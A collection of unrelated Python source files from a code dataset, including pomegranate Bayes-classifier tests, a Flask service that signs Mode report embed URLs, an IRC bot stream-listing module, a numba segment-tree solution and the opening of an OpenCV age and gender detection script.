d22 = LogNormalDistribution(0.2, 0.8)
d23 = PoissonDistribution(3)
d2 = IndependentComponentsDistribution([d21, d22, d23])
global model
model = BayesClassifier([d1, d2])
global X
X = numpy.array([[ 0.3, 0.5, 0.1],
[ 0.8, 1.4, 0.5],
[ 1.4, 2.6, 1.8],
[ 4.2, 3.3, 3.7],
[ 2.6, 3.6, 3.3],
[ 3.1, 2.2, 1.7],
[ 1.8, 2.2, 1.8],
[ 1.2, 1.8, 1.5],
[ 1.8, 0.3, 0.5],
[ 0.7, 1.3, 0.1]])
global y
y = [0, 0, 0, 1, 1, 1, 1, 0, 0, 0]
global X_nan
X_nan = numpy.array([[ 0.3, nan, 0.1],
[ nan, 1.4, nan],
[ 1.4, 2.6, nan],
[ nan, nan, nan],
[ nan, 3.6, 3.3],
[ 3.1, nan, 1.7],
[ nan, nan, 1.8],
[ 1.2, 1.8, 1.5],
[ nan, 0.3, 0.5],
[ nan, 1.3, nan]])
def setup_hmm():
global model
global hmm1
global hmm2
global hmm3
rigged = State( DiscreteDistribution({ 'H': 0.8, 'T': 0.2 }) )
unrigged = State( DiscreteDistribution({ 'H': 0.5, 'T':0.5 }) )
hmm1 = HiddenMarkovModel()
hmm1.start = rigged
hmm1.add_transition(rigged, rigged, 1)
hmm1.bake()
hmm2 = HiddenMarkovModel()
hmm2.start = unrigged
hmm2.add_transition(unrigged, unrigged, 1)
hmm2.bake()
hmm3 = HiddenMarkovModel()
hmm3.add_transition(hmm3.start, unrigged, 0.5)
hmm3.add_transition(hmm3.start, rigged, 0.5)
hmm3.add_transition(rigged, rigged, 0.5)
hmm3.add_transition(rigged, unrigged, 0.5)
hmm3.add_transition(unrigged, rigged, 0.5)
hmm3.add_transition(unrigged, unrigged, 0.5)
hmm3.bake()
model = BayesClassifier([hmm1, hmm2, hmm3])
def setup_multivariate():
pass
def teardown():
pass
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_initialization():
assert_equal(model.d, 3)
assert_equal(model.n, 2)
assert_equal(model.is_vl_, False)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_initialization():
assert_equal(model.d, 3)
assert_equal(model.n, 2)
assert_equal(model.is_vl_, False)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_log_proba():
y_hat = model.predict_log_proba(X)
y = [[ -1.48842547e-02, -4.21488425e+00],
[ -4.37487950e-01, -1.03748795e+00],
[ -5.60369104e+00, -3.69104343e-03],
[ -1.64000001e+01, -7.54345812e-08],
[ -1.30000023e+01, -2.26032685e-06],
[ -8.00033541e+00, -3.35406373e-04],
[ -5.60369104e+00, -3.69104343e-03],
[ -3.05902274e-07, -1.50000003e+01],
[ -3.35406373e-04, -8.00033541e+00],
[ -6.11066022e-04, -7.40061107e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_log_proba():
y_hat = model.predict_log_proba(X)
y = [[ -5.03107596e-01, -9.27980626e-01],
[ -1.86355320e-01, -1.77183117e+00],
[ -5.58542088e-01, -8.48731256e-01],
[ -7.67315597e-01, -6.24101927e-01],
[ -2.32860808e+00, -1.02510436e-01],
[ -3.06641866e-03, -5.78877778e+00],
[ -9.85292840e-02, -2.36626165e+00],
[ -2.61764180e-01, -1.46833995e+00],
[ -2.01640009e-03, -6.20744952e+00],
[ -1.47371167e-01, -1.98758175e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_nan_predict_log_proba():
y_hat = model.predict_log_proba(X_nan)
y = [[ -3.99533332e-02, -3.23995333e+00],
[ -1.17110067e+00, -3.71100666e-01],
[ -4.01814993e+00, -1.81499279e-02],
[ -6.93147181e-01, -6.93147181e-01],
[ -9.80005545e+00, -5.54500620e-05],
[ -5.60369104e+00, -3.69104343e-03],
[ -1.78390074e+00, -1.83900741e-01],
[ -3.05902274e-07, -1.50000003e+01],
[ -8.68361522e-02, -2.48683615e+00],
[ -1.00016521e-02, -4.61000165e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_nan_predict_log_proba():
y_hat = model.predict_log_proba(X_nan)
y = [[ -3.57980882e-01, -1.20093223e+00],
[ -1.20735130e+00, -3.55230506e-01],
[ -2.43174286e-01, -1.53310132e+00],
[ -6.93147181e-01, -6.93147181e-01],
[ -9.31781101e+00, -8.98143220e-05],
[ -6.29755079e-04, -7.37049444e+00],
[ -1.31307006e+00, -3.13332194e-01],
[ -2.61764180e-01, -1.46833995e+00],
[ -2.29725479e-01, -1.58353505e+00],
[ -1.17299253e+00, -3.70251760e-01]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_log_proba_parallel():
y_hat = model.predict_log_proba(X, n_jobs=2)
y = [[ -1.48842547e-02, -4.21488425e+00],
[ -4.37487950e-01, -1.03748795e+00],
[ -5.60369104e+00, -3.69104343e-03],
[ -1.64000001e+01, -7.54345812e-08],
[ -1.30000023e+01, -2.26032685e-06],
[ -8.00033541e+00, -3.35406373e-04],
[ -5.60369104e+00, -3.69104343e-03],
[ -3.05902274e-07, -1.50000003e+01],
[ -3.35406373e-04, -8.00033541e+00],
[ -6.11066022e-04, -7.40061107e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_log_proba_parallel():
y_hat = model.predict_log_proba(X, n_jobs=2)
y = [[ -5.03107596e-01, -9.27980626e-01],
[ -1.86355320e-01, -1.77183117e+00],
[ -5.58542088e-01, -8.48731256e-01],
[ -7.67315597e-01, -6.24101927e-01],
[ -2.32860808e+00, -1.02510436e-01],
[ -3.06641866e-03, -5.78877778e+00],
[ -9.85292840e-02, -2.36626165e+00],
[ -2.61764180e-01, -1.46833995e+00],
[ -2.01640009e-03, -6.20744952e+00],
[ -1.47371167e-01, -1.98758175e+00]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_proba():
y_hat = model.predict_proba(X)
y = [[ 9.85225968e-01, 1.47740317e-02],
[ 6.45656306e-01, 3.54343694e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 7.54345778e-08, 9.99999925e-01],
[ 2.26032430e-06, 9.99997740e-01],
[ 3.35350130e-04, 9.99664650e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 9.99999694e-01, 3.05902227e-07],
[ 9.99664650e-01, 3.35350130e-04],
[ 9.99389121e-01, 6.10879359e-04]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_proba():
y_hat = model.predict_proba(X)
y = [[ 0.60464873, 0.39535127],
[ 0.82997863, 0.17002137],
[ 0.57204244, 0.42795756],
[ 0.46425765, 0.53574235],
[ 0.09743127, 0.90256873],
[ 0.99693828, 0.00306172],
[ 0.90616916, 0.09383084],
[ 0.76969251, 0.23030749],
[ 0.99798563, 0.00201437],
[ 0.86297361, 0.13702639]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_nan_predict_proba():
y_hat = model.predict_proba(X_nan)
y = [[ 9.60834277e-01, 3.91657228e-02],
[ 3.10025519e-01, 6.89974481e-01],
[ 1.79862100e-02, 9.82013790e-01],
[ 5.00000000e-01, 5.00000000e-01],
[ 5.54485247e-05, 9.99944551e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 1.67981615e-01, 8.32018385e-01],
[ 9.99999694e-01, 3.05902227e-07],
[ 9.16827304e-01, 8.31726965e-02],
[ 9.90048198e-01, 9.95180187e-03]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_nan_predict_proba():
y_hat = model.predict_proba(X_nan)
y = [[ 6.99086440e-01, 3.00913560e-01],
[ 2.98988163e-01, 7.01011837e-01],
[ 7.84134838e-01, 2.15865162e-01],
[ 5.00000000e-01, 5.00000000e-01],
[ 8.98102888e-05, 9.99910190e-01],
[ 9.99370443e-01, 6.29556825e-04],
[ 2.68992964e-01, 7.31007036e-01],
[ 7.69692511e-01, 2.30307489e-01],
[ 7.94751748e-01, 2.05248252e-01],
[ 3.09439547e-01, 6.90560453e-01]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_proba_parallel():
y_hat = model.predict_proba(X, n_jobs=2)
y = [[ 9.85225968e-01, 1.47740317e-02],
[ 6.45656306e-01, 3.54343694e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 7.54345778e-08, 9.99999925e-01],
[ 2.26032430e-06, 9.99997740e-01],
[ 3.35350130e-04, 9.99664650e-01],
[ 3.68423990e-03, 9.96315760e-01],
[ 9.99999694e-01, 3.05902227e-07],
[ 9.99664650e-01, 3.35350130e-04],
[ 9.99389121e-01, 6.10879359e-04]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_proba_parallel():
y_hat = model.predict_proba(X, n_jobs=2)
y = [[ 0.60464873, 0.39535127],
[ 0.82997863, 0.17002137],
[ 0.57204244, 0.42795756],
[ 0.46425765, 0.53574235],
[ 0.09743127, 0.90256873],
[ 0.99693828, 0.00306172],
[ 0.90616916, 0.09383084],
[ 0.76969251, 0.23030749],
[ 0.99798563, 0.00201437],
[ 0.86297361, 0.13702639]]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict():
y_hat = model.predict(X)
y = [0, 0, 1, 1, 1, 1, 1, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict():
y_hat = model.predict(X)
y = [0, 0, 0, 1, 1, 0, 0, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_nan_predict():
y_hat = model.predict(X_nan)
y = [0, 1, 1, 0, 1, 1, 1, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_nan_predict():
y_hat = model.predict(X_nan)
y = [0, 1, 0, 0, 1, 0, 1, 0, 0, 1]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_predict_parallel():
y_hat = model.predict(X, n_jobs=2)
y = [0, 0, 1, 1, 1, 1, 1, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_predict_parallel():
y_hat = model.predict(X, n_jobs=2)
y = [0, 0, 0, 1, 1, 0, 0, 0, 0, 0]
assert_array_almost_equal(y, y_hat)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_fit_parallel():
model.fit(X, y, n_jobs=2)
mu1 = model.distributions[0].parameters[0]
cov1 = model.distributions[0].parameters[1]
mu1_t = [0.03333333, 0.28333333, 0.21666666]
cov1_t = [[1.3088888, 0.9272222, 0.6227777],
[0.9272222, 2.2513888, 1.3402777],
[0.6227777, 1.3402777, 0.9547222]]
mu2 = model.distributions[1].parameters[0]
cov2 = model.distributions[1].parameters[1]
mu2_t = [2.925, 2.825, 2.625]
cov2_t = [[0.75687499, 0.23687499, 0.4793750],
[0.23687499, 0.40187499, 0.5318749],
[0.47937500, 0.53187499, 0.7868750]]
assert_array_almost_equal(mu1, mu1_t)
assert_array_almost_equal(cov1, cov1_t)
assert_array_almost_equal(mu2, mu2_t)
assert_array_almost_equal(cov2, cov2_t)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_fit_parallel():
model.fit(X, y, n_jobs=2)
mu1 = model.distributions[0].parameters[0]
cov1 = model.distributions[0].parameters[1]
mu1_t = [1.033333, 1.3166667, 0.75]
cov1_t = [[0.242222, 0.0594444, 0.178333],
[0.059444, 0.5980555, 0.414166],
[0.178333, 0.4141666, 0.439166]]
d21 = model.distributions[1].distributions[0]
d22 = model.distributions[1].distributions[1]
d23 = model.distributions[1].distributions[2]
assert_array_almost_equal(mu1, mu1_t)
assert_array_almost_equal(cov1, cov1_t)
assert_array_almost_equal(d21.parameters, [0.34188034])
assert_array_almost_equal(d22.parameters, [1.01294275, 0.22658346])
assert_array_almost_equal(d23.parameters, [2.625])
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_from_samples():
model = BayesClassifier.from_samples(MultivariateGaussianDistribution, X, y)
mu1 = model.distributions[0].parameters[0]
cov1 = model.distributions[0].parameters[1]
mu1_t = [0.03333333, 0.2833333, 0.21666666]
cov1_t = [[1.308888888, 0.9272222222, 0.6227777777],
[0.927222222, 2.251388888, 1.340277777],
[0.622777777, 1.340277777, 0.9547222222]]
mu2 = model.distributions[1].parameters[0]
cov2 = model.distributions[1].parameters[1]
mu2_t = [2.925, 2.825, 2.625]
cov2_t = [[0.75687500, 0.23687499, 0.47937500],
[0.23687499, 0.40187499, 0.53187499],
[0.47937500, 0.53187499, 0.78687500]]
assert_array_almost_equal(mu1, mu1_t)
assert_array_almost_equal(cov1, cov1_t)
assert_array_almost_equal(mu2, mu2_t)
assert_array_almost_equal(cov2, cov2_t)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_pickle():
model2 = pickle.loads(pickle.dumps(model))
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], MultivariateGaussianDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_pickle():
model2 = pickle.loads(pickle.dumps(model))
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], IndependentComponentsDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_to_json():
model2 = BayesClassifier.from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], MultivariateGaussianDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_to_json():
model2 = BayesClassifier.from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], IndependentComponentsDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_gaussian, teardown)
def test_bc_multivariate_gaussian_robust_from_json():
model2 = from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], MultivariateGaussianDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_multivariate_mixed, teardown)
def test_bc_multivariate_mixed_robust_from_json():
model2 = from_json(model.to_json())
assert_true(isinstance(model2, BayesClassifier))
assert_true(isinstance(model2.distributions[0], MultivariateGaussianDistribution))
assert_true(isinstance(model2.distributions[1], IndependentComponentsDistribution))
assert_array_almost_equal(model.weights, model2.weights)
@with_setup(setup_hmm, teardown)
def test_model():
assert_almost_equal(hmm1.log_probability(list('H')), -0.2231435513142097 )
assert_almost_equal(hmm1.log_probability(list('T')), -1.6094379124341003 )
assert_almost_equal(hmm1.log_probability(list('HHHH')), -0.8925742052568388 )
assert_almost_equal(hmm1.log_probability(list('THHH')), -2.2788685663767296 )
assert_almost_equal(hmm1.log_probability(list('TTTT')), -6.437751649736401 )
assert_almost_equal(hmm2.log_probability(list('H')), -0.6931471805599453 )
assert_almost_equal(hmm2.log_probability(list('T')), -0.6931471805599453 )
assert_almost_equal(hmm2.log_probability(list('HHHH')), -2.772588722239781 )
assert_almost_equal(hmm2.log_probability(list('THHH')), -2.772588722239781 )
assert_almost_equal(hmm2.log_probability(list('TTTT')), -2.772588722239781 )
assert_almost_equal(hmm3.log_probability(list('H')), -0.43078291609245417)
assert_almost_equal(hmm3.log_probability(list('T')), -1.0498221244986776)
assert_almost_equal(hmm3.log_probability(list('HHHH')), -1.7231316643698167)
assert_almost_equal(hmm3.log_probability(list('THHH')), -2.3421708727760397)
assert_almost_equal(hmm3.log_probability(list('TTTT')), -4.1992884979947105)
assert_almost_equal(hmm3.log_probability(list('THTHTHTHTHTH')), -8.883630243546788)
assert_almost_equal(hmm3.log_probability(list('THTHHHHHTHTH')), -7.645551826734343)
assert_equal(model.d, 1)
@with_setup(setup_hmm, teardown)
def test_hmm_log_proba():
logs = model.predict_log_proba(np.array([list('H'), list('THHH'), list('TTTT'), list('THTHTHTHTHTH'), list('THTHHHHHTHTH')]))
assert_almost_equal(logs[0][0], -0.89097292388986515)
assert_almost_equal(logs[0][1], -1.3609765531356006)
assert_almost_equal(logs[0][2], -1.0986122886681096)
assert_almost_equal(logs[1][0], -0.93570553121744293)
assert_almost_equal(logs[1][1], -1.429425687080494)
assert_almost_equal(logs[1][2], -0.9990078376167526)
assert_almost_equal(logs[2][0], -3.9007882563128864)
assert_almost_equal(logs[2][1], -0.23562532881626597)
assert_almost_equal(logs[2][2], -1.6623251045711958)
assert_almost_equal(logs[3][0], -3.1703366478831185)
assert_almost_equal(logs[3][1], -0.49261403211260379)
assert_almost_equal(logs[3][2], -1.058478108940049)
assert_almost_equal(logs[4][0], -1.3058441172130273)
assert_almost_equal(logs[4][1], -1.4007102236822906)
assert_almost_equal(logs[4][2], -0.7284958836972919)
@with_setup(setup_hmm, teardown)
def test_hmm_proba():
probs = model.predict_proba(np.array([list('H'), list('THHH'), list('TTTT'), list('THTHTHTHTHTH'), list('THTHHHHHTHTH')]))
assert_almost_equal(probs[0][0], 0.41025641025641024)
assert_almost_equal(probs[0][1], 0.25641025641025639)
assert_almost_equal(probs[0][2], 0.33333333333333331)
assert_almost_equal(probs[1][0], 0.39230898163446098)
assert_almost_equal(probs[1][1], 0.23944639992337707)
assert_almost_equal(probs[1][2], 0.36824461844216183)
assert_almost_equal(probs[2][0], 0.020225961918306088)
assert_almost_equal(probs[2][1], 0.79007663743383105)
assert_almost_equal(probs[2][2], 0.18969740064786292)
assert_almost_equal(probs[3][0], 0.041989459861032523)
assert_almost_equal(probs[3][1], 0.61102706038265642)
assert_almost_equal(probs[3][2], 0.346983479756311)
assert_almost_equal(probs[4][0], 0.27094373022369794)
assert_almost_equal(probs[4][1], 0.24642188711704707)
assert_almost_equal(probs[4][2], 0.48263438265925512)
@with_setup(setup_hmm, teardown)
def test_hmm_prediction():
predicts = model.predict(np.array([list('H'), list('THHH'), list('TTTT'), list('THTHTHTHTHTH'), list('THTHHHHHTHTH')]))
assert_equal(predicts[0], 0)
assert_equal(predicts[1], 0)
assert_equal(predicts[2], 1)
assert_equal(predicts[3], 1)
assert_equal(predicts[4], 2)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_log_probability():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
logp1 = model.log_probability(X)
logp2 = model.log_probability(X2)
logp3 = model.log_probability(X3)
assert_array_almost_equal(logp1, logp2)
assert_array_almost_equal(logp1, logp3)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_predict():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
y_hat1 = model.predict(X)
y_hat2 = model.predict(X2)
y_hat3 = model.predict(X3)
assert_array_almost_equal(y_hat1, y_hat2)
assert_array_almost_equal(y_hat1, y_hat3)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_predict_proba():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
y_hat1 = model.predict_proba(X)
y_hat2 = model.predict_proba(X2)
y_hat3 = model.predict_proba(X3)
assert_array_almost_equal(y_hat1, y_hat2)
assert_array_almost_equal(y_hat1, y_hat3)
@with_setup(setup_multivariate_gaussian, teardown)
def test_io_predict_log_proba():
X2 = DataGenerator(X)
X3 = DataFrameGenerator(pandas.DataFrame(X))
y_hat1 = model.predict_log_proba(X)
y_hat2 = model.predict_log_proba(X2)
y_hat3 = model.predict_log_proba(X3)
assert_array_almost_equal(y_hat1, y_hat2)
assert_array_almost_equal(y_hat1, y_hat3)
def test_io_fit():
X = numpy.random.randn(100, 5) + 0.5
weights = numpy.abs(numpy.random.randn(100))
y = numpy.random.randint(2, size=100)
data_generator = DataGenerator(X, weights, y)
mu1 = numpy.array([0, 0, 0, 0, 0])
mu2 = numpy.array([1, 1, 1, 1, 1])
cov = numpy.eye(5)
d1 = MultivariateGaussianDistribution(mu1, cov)
d2 = MultivariateGaussianDistribution(mu2, cov)
bc1 = BayesClassifier([d1, d2])
bc1.fit(X, y, weights)
d1 = MultivariateGaussianDistribution(mu1, cov)
d2 = MultivariateGaussianDistribution(mu2, cov)
bc2 = BayesClassifier([d1, d2])
bc2.fit(data_generator)
logp1 = bc1.log_probability(X)
logp2 = bc2.log_probability(X)
assert_array_almost_equal(logp1, logp2)
def test_io_from_samples():
X = numpy.random.randn(100, 5) + 0.5
weights = numpy.abs(numpy.random.randn(100))
y = numpy.random.randint(2, size=100)
data_generator = DataGenerator(X, weights, y)
d = MultivariateGaussianDistribution
bc1 = BayesClassifier.from_samples(d, X=X, y=y, weights=weights)
bc2 = BayesClassifier.from_samples(d, X=data_generator)
logp1 = bc1.log_probability(X)
logp2 = bc2.log_probability(X)
assert_array_almost_equal(logp1, logp2)
|
StarcoderdataPython
|
1878965
|
#!env python3
from flask import Flask, request, redirect
from hashlib import sha256
import hmac
import base64
import time
import urllib
# allow for relative importing if run directly
if __name__ == "__main__":
from config import secrets, reports, listen_port
else:
from .config import secrets, reports, listen_port
app = Flask(__name__)
@app.route('/report/<report>')
def sign_report_url(report):
# check for a valid token
provided_token = request.args.get('token') or 'missing'
if provided_token != secrets.get('access_token'):
return "Missing or incorrect token provided"
# lookup report and generate URL from values
if report in reports:
this_report = reports.get(report)
# Generating the embed URL
mode_report_id = this_report.get('mode_report')
param_name = this_report.get('param_name')
param_value = request.args.get(
'account_id') or this_report.get('param_default_value')
do_iframe = request.args.get('iframe') or False
timestamp = str(int(time.time())) # current time in unix time
url = make_url('https://app.mode.com', secrets.get('mode_team'), 'reports',
mode_report_id, 'embed', access_key=secrets.get('mode_access_key'),
max_age=3600, **{param_name: param_value}, run='now', timestamp=timestamp)
else:
return f"Missing report {report}"
request_type = 'GET'
content_type = ''
# the MD5 digest of an empty content body, always the same, :shrug:
content_digest = '1B2M2Y8AsgTpgAmY7PhCfg=='
# signature fodder
request_string = ','.join(
[request_type, content_type, str(content_digest), url, timestamp])
signature = hmac.new(bytes(secrets.get('mode_access_secret'), 'utf-8'),
bytes(request_string, 'utf-8'), digestmod=sha256).hexdigest()
signed_url = '%s&signature=%s' % (url, signature)
if do_iframe is not False:
# return the signed URL as an iframe
return f"""
<iframe src='{signed_url}' width='100%' height='100%' frameborder='0' </iframe>
"""
else:
# return the signed URL as a redirect
return redirect(signed_url, code=302)
def make_url(base_url, *res, **params):
url = base_url
for r in res:
url = '{}/{}'.format(url, r)
if params:
url = '{}?{}'.format(url, urllib.parse.urlencode(params))
return url
@app.route('/status')
def status():
return 'Success'
if __name__ == "__main__":
app.run(host='0.0.0.0', port=listen_port)
|
StarcoderdataPython
|
4914264
|
import willie, sys, json
from os.path import expanduser
def setup(bot):
global twitchlist
with open("{0}/.willie/conf-module/streams.json".format(expanduser("~"))) as f: # loads streams.json from USER_HOME/.willie/conf-module/
twitchlist = json.load(f)
def lookup_twitch():
global twitchlist
twitchers = []
for twitcher in twitchlist["streamlist"]:
twitchers.append(twitcher)
twitchers = ",".join(twitchers)
try:
js = willie.web.get("https://api.twitch.tv/kraken/streams?channel=%s" % twitchers, timeout=10, verify_ssl=False)
return json.loads(js)
except:# whatever web.get throws and possible valueerror from json.loads
return None
def lookup_hitbox(team="speedfriends"):
try:
js = willie.web.get("https://api.hitbox.tv/team/%s?liveonly=true&media=true&fast=true"% team, timeout=10, verify_ssl=False)
return json.loads(js)
except:# same thing here
return None
@willie.module.commands("streams")
@willie.module.thread(True)
def streams(bot, trigger):
tw = lookup_twitch()
hb = lookup_hitbox()
msgs = []
msg = ""
c = 0
if hb is not None:
streams = hb["media"]["livestream"]
for stream in streams:
msg += "\x0313https://hitbox.tv/%s\x03 %s \x0313|\x03 " % (stream["media_display_name"].lower(), stream["media_status"])
c += 1
if c % 4 is 0:
msgs.append(msg)
msg = ""
if tw is not None:
streams = tw["streams"]
for stream in streams:
if len(stream["channel"]["status"]) < 2 and stream["game"]:
description = stream["game"]
else:
description = stream["channel"]["status"].rstrip("\n")
msg += "\x037http://twitch.tv/%s\x03 %s \x033|\x03 " % (stream["channel"]["name"], description)
c += 1
if c % 4 is 0:
msgs.append(msg)
msg = ""
if msg:# add the remaining streams
msgs.append(msg)
if not msgs:
bot.reply("No streams found, try again later")
return
for msg in msgs:
bot.say(msg[:-3])# cut the last 3 characters which are normally used as dividers
|
StarcoderdataPython
|
3554338
|
<reponame>cyrilbois/PFNET.py<gh_stars>1-10
#***************************************************#
# This file is part of PFNET. #
# #
# Copyright (c) 2015-2017, <NAME>. #
# #
# PFNET is released under the BSD 2-clause license. #
#***************************************************#
from .dummy_function import DummyGenCost
|
StarcoderdataPython
|
1653995
|
# -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
"""
Config handler for Clang Tidy analyzer.
"""
from codechecker_common.logger import get_logger
from .. import config_handler
LOG = get_logger('analyzer.tidy')
class ClangTidyConfigHandler(config_handler.AnalyzerConfigHandler):
"""
Configuration handler for Clang-tidy analyzer.
"""
def __init__(self):
super(ClangTidyConfigHandler, self).__init__()
def set_checker_enabled(self, checker_name, enabled=True):
"""
Enable checker, keep description if already set.
"""
if checker_name.startswith('W') or \
checker_name.startswith('clang-diagnostic'):
self.add_checker(checker_name)
super(ClangTidyConfigHandler, self).set_checker_enabled(checker_name,
enabled)
|
StarcoderdataPython
|
381610
|
import typing
import sys
import numpy as np
import numba as nb
from numba import njit, i8
@njit
def seg_f(
a: int,
b: int,
) -> int:
if a >= b: return a
return b
@njit
def seg_e() -> int:
return 0
@njit
def build_seg(
raw: np.array,
) -> np.array:
n = raw.size
a = np.zeros(
n << 1,
dtype=np.int64,
)
a[n:] = raw
for i in range(n - 1, 0, -1):
a[i] = seg_f(
a[i << 1],
a[i << 1 | 1],
)
return a
@njit
def set_val(
seg: np.array,
i: int,
x: int,
) -> typing.NoReturn:
n = seg.size // 2
i += n
seg[i] = x
while i > 1:
i >>= 1
seg[i] = seg_f(
seg[i << 1],
seg[i << 1 | 1],
)
@njit(
(i8, i8[:], i8[:]),
cache=True,
)
def solve(
n: int,
h: np.array,
a: np.array,
) -> typing.NoReturn:
h -= 1
seg = np.zeros(
n,
dtype=np.int64,
)
seg = build_seg(seg)
print(seg)
def main() -> typing.NoReturn:
n = int(input())
h = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
a = np.array(
sys.stdin.readline()
.split(),
dtype=np.int64,
)
solve(n, h, a)
main()
|
StarcoderdataPython
|
8159608
|
import os
import math
import time
import cv2 as cv
import numpy as np
from age_gender_ssrnet.SSRNET_model import SSR_net_general, SSR_net
from time import sleep
# Desired width and height to process video.
# Typically it should be smaller than original video frame
# as smaller size significantly speeds up processing almost without affecting quality.
width = 480
height = 340
# Choose which face detector to use. Select 'haar' or 'net'
face_detector_kind = 'haar'
# Choose what age and gender model to use. Specify 'ssrnet' or 'net'
age_gender_kind = 'ssrnet'
# Diagonal and line thickness are computed at run-time
diagonal, line_thickness = None, None
# Initialize numpy random generator
np.random.seed(int(time.time()))
# Set video to load
videos = []
for file_name in os.listdir('videos'):
file_name = 'videos/' + file_name
if os.path.isfile(file_name) and file_name.endswith('.mp4'):
videos.append(file_name)
source_path = videos[np.random.randint(len(videos))]
# Create a video capture object to read videos
cap = cv.VideoCapture(source_path)
# Initialize face detector
if (face_detector_kind == 'haar'):
face_cascade = cv.CascadeClassifier('face_haar/haarcascade_frontalface_alt.xml')
else:
face_net = cv.dnn.readNetFromTensorflow('face_net/opencv_face_detector_uint8.pb', 'face_net/opencv_face_detector.pbtxt')
gender_net = None
age_net = None
# Load age and gender models
if (age_gender_kind == 'ssrnet'):
# Setup global parameters
face_size = 64
face_padding_ratio = 0.10
# Default parameters for SSR-Net
stage_num = [3, 3, 3]
lambda_local = 1
lambda_d = 1
# Initialize gender net
gender_net = SSR_net_general(face_size, stage_num, lambda_local, lambda_d)()
gender_net.load_weights('age_gender_ssrnet/ssrnet_gender_3_3_3_64_1.0_1.0.h5')
# Initialize age net
age_net = SSR_net(face_size, stage_num, lambda_local, lambda_d)()
age_net.load_weights('age_gender_ssrnet/ssrnet_age_3_3_3_64_1.0_1.0.h5')
else:
# Setup global parameters
face_size = 227
face_padding_ratio = 0.0
# Initialize gender detector
gender_net = cv.dnn.readNetFromCaffe('age_gender_net/deploy_gender.prototxt', 'age_gender_net/gender_net.caffemodel')
# Initialize age detector
